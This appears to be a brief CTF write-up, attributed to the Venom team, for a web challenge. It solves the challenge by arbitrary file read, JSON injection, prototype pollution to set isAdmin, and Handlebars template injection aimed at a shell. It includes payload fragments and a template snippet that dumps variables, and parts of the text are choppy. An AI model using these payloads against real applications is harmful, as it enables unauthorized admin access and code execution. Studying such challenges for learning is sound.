华为HCIE的第一课

点击此处获得更好的阅读体验


WriteUp来源

来自Venom战队发布

题目描述

一个简单的web

题目考点

  • 任意文件读取

  • JSON注入

  • 原型链污染

  • HandleBars模板注入

解题思路

?f=xxx任意文件读取,脱下来的源码(不过跑不起来不知道为啥,app.set报错)

","proto":{"isAdmin":1},"ip":"模版注入getshell

第一步、利用原型链污染成为admin lih3iu","proto":{"isAdmin":1},"b":"1

利用handlebars语法打印变量

1
2
3
4
5
{{#each this}}
{{#each this}}
{{this.toString}}
{{/each}}
{{/each}}